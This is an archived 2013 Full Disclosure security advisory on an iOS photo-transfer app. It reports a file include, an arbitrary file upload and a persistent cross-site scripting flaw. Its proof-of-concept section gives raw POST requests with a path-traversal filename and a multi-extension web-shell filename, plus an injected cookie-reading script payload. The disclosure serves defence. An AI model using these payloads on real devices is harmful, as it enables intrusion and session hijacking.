Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Photo Transfer Upload v1.0 iOS - Multiple Vulnerabilities

From: Vulnerability Lab <research () vulnerability-lab com>
Date: Fri, 16 Aug 2013 01:10:36 +0100
Title:
======
Photo Transfer Upload v1.0 iOS - Multiple Vulnerabilities


Date:
=====
2013-08-16


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1047


VL-ID:
=====
1047


Common Vulnerability Scoring System:
====================================
8.6


Introduction:
=============
Photo Transfer Access and transfer all your photos between your iPhone/iPad and PC/Mac without 3rd party transfer 
utilities.
It can easily access your photo libraries via wifi from any computer with a web browser(IE/Chrome/Safari) on the same 
wifi 
network, very easy to use!

- Support drag & drop upload, easy to use
- Transfer multiple photos and videos at once
- Download photos and videos as zip archives
- Crate new album
- Password protection for the web access

( Copy of the Homepage: https://itunes.apple.com/us/app/photo-transfer-upload-download/id672205608 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the Photo Transfer Upload v1.0 
application (Apple iOS - iPad & iPhone).


Report-Timeline:
================
2013-08-16:    Public Disclosure (Vulnerability Laboratory)


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: Photo Transfer Upload - Mobile Application 1.0


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
1.1
A local file/path include web vulnerability is detected in the Photo Transfer Upload v1.0 application (Apple iOS - iPad 
& iPhone).
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise 
the application or service.

The vulnerability is located in the upload module when processing to upload files with manipulated filename values in 
the POST method request. 
The attacker can inject local path or files to request context and compromise the mobile device or web service. The 
validation has a bad side 
effect which impacts the risk to combine the attack with persistent injected script code.

Exploitation of the local file include web vulnerability requires no user interaction or privilege application user 
account with password. 
Successful exploitation of the vulnerability results in unauthorized local file and path requests to compromise the 
device or application.

Vulnerable Application(s):
                                [+] Photo Transfer Upload v1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
                                [+] Upload (Files) - (http://localhost)

Vulnerable Parameter(s):
                                [+] filename 

Affected Module(s):
                                [+] Index File Dir Listing



1.2
An arbitrary file upload web vulnerability is detected in the Photo Transfer Upload v1.0 application (Apple iOS - iPad 
& iPhone).
The arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the 
validation for unauthorized access.

The vulnerability is located in the upload module when processing to upload files with multiple ending extensions. 
Attackers are able to upload 
a php or js web-shells by renaming the file with multiple extensions. The attacker uploads for example a web-shell with 
the following name and 
extension image.jpg.js.php.jpg . The attacker needs to open the file in the web application and deletes the .jpg file 
extension to access the 
picture with elevated access rights.

Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user 
account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the 
upload of web-shells.

Vulnerable Application(s):
                                [+] Photo Transfer Upload v1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
                                [+] Upload (Files) - (http://localhost)

Vulnerable Parameter(s):
                                [+] filename (multiple extensions)

Affected Module(s):
                                [+] Index File Dir Listing


1.3
A persistent input validation web vulnerability is detected in the Photo Transfer Upload v1.0 application (Apple iOS - 
iPad & iPhone).
The bug allows an attacker (remote) to implement/inject malicious own malicious persistent script codes (application 
side).

The vulnerability is located in the `Add Photo Album` module of the web-server interface (http://localhost) when 
processing to 
request via POST method manipulated `album names`. The album name will be changed to the path value without secure 
filter, 
encode or parse mechanism. The injected script code will be executed in the main index file dir folder listing of the 
mobile application.

Exploitation of the persistent web vulnerability requires low user interaction and no privilege application user 
account with a password. 
Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via 
persistent web attacks, 
persistent phishing or persistent module context manipulation.

Vulnerable Application(s):
                                [+] Photo Transfer Upload v1.0 - ITunes or AppStore (Apple)

Vulnerable Module(s):
                                [+] Add Photo Album

Vulnerable Parameter(s):
                                [+] Album Name

Affected Module(s):
                                [+] Index Listing
                                [+] Sub Category Listing


Proof of Concept:
=================
1.1
The file/path include web vulnerability can be exploited by remote attackers without user interaction or 
privilege application user account. For demonstration or reproduce ...


--- POST --- (Upload #1)
POSTDATA =-----------------------------144252594127308
Content-Disposition: form-data; name="params"

name:Camera%20Roll|url:95016B21-FEE4-43E5-802D-3891B9C6ACF4
-----------------------------144252594127308
Content-Disposition: form-data; name="newfile"; filename="><;../../var/mobile/x[FILE INCLUDE VULNERABILITY]"
Content-Type: image/png
‰PNG
-
--- POST --- (LIST INDEX #1 #2)
POSTDATA={"url":"ALL"}


Note: After the file/path include the attacker can open the index module or sub category to execute the request.



1.2
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or 
privilege application user account. For demonstration or reproduce ...


--- POST --- (Upload #2)
POSTDATA =-----------------------------144252594127308
Content-Disposition: form-data; name="params"

name:Camera%20Roll|url:95016B21-FEE4-43E5-802D-3891B9C6ACF4
-----------------------------144252594127308
Content-Disposition: form-data; name="newfile"; filename="pentester.jpg.html.js.php.asp.xml.jpg"
Content-Type: image/png
‰PNG

--- POST --- (LIST INDEX #1 #2)
POSTDATA={"url":"ALL"}

Note: After the file upload the attacker deletes the .jpg extension to access the injected webshell.



1.3
The persistent input validation web vulnerability can be exploited by remote attackers without privilege application 
user 
account and also without user interaction. For demonstration or reproduce ...


PoC:  Index - Album Name

<ul class="thumbnails" id="albums"><li class="album_warp"><a href="http://localhost/album.html?name=Camera%20Roll&;
url=assets-library://group/?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C" class="thumbnail">
<img src="Photo%20Transfer_files/-1886868417.PNG" class="album_image"><h5 class="album_title">Camera Roll</h5>
<p class="album_desc">11 Photos</p></a></li><li class="album_warp">
<a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20style=%222&;
url=assets-library://group/?id=68D6D844-02EB-45C9-AA9E-28255915C551" class="thumbnail"><img 
src="Photo%20Transfer_files/placeholder.png" 
class="album_image"></a><h5 class="album_title">
<a href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20style=%222&;
url=assets-library://group/?id=68D6D844-02EB-45C9-AA9E-28255915C551" class="thumbnail">>"</a><div style="2</h5>
<p class=" album_desc"=""><a 
href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20
style=%222&url=assets-library://group/?id=68D6D844-02EB-45C9-AA9E-28255915C551" class="thumbnail">0 
Photos<p></p></a></div></h5></li>
<li class="album_warp"><a 
href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cdiv%20style=%221&;
url=assets-library://group/?id=C5231091-88C7-40E9-8C73-47FBEA7EBB65" class="thumbnail"><img 
src="Photo%20Transfer_files/placeholder.png" 
class="album_image"></a><h5 class="album_title"><a 
href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/
script%3E%3Cdiv%20style=%221&url=assets-library://group/?id=C5231091-88C7-40E9-8C73-47FBEA7EBB65" 
class="thumbnail">>"</a>
<div style="1</h5><p class=" album_desc"=""><a 
href="http://localhost/album.html?name=%3E%22%3Cscript%3Ealert%28document.cookie%29%3C/
script%3E%3Cdiv%20style=%221&url=assets-library://group/?id=C5231091-88C7-40E9-8C73-47FBEA7EBB65" class="thumbnail">0 
Photos<p>
</p></a></div></h5></li></ul>


Solution:
=========
The vulnerability can be patched by a secure encoding or escape  when processing to add via POST method request folders 
with manipulated names.


Risk:
=====
The security risk of the persistent input validation web vulnerability is estimated as medium(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () evolution-sec com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss 
of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such 
damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack 
into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com            - admin () evolution-sec 
com
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com                   - 
magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the 
use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, 
videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, 
list (feed), 
modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a 
permission.

                                Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: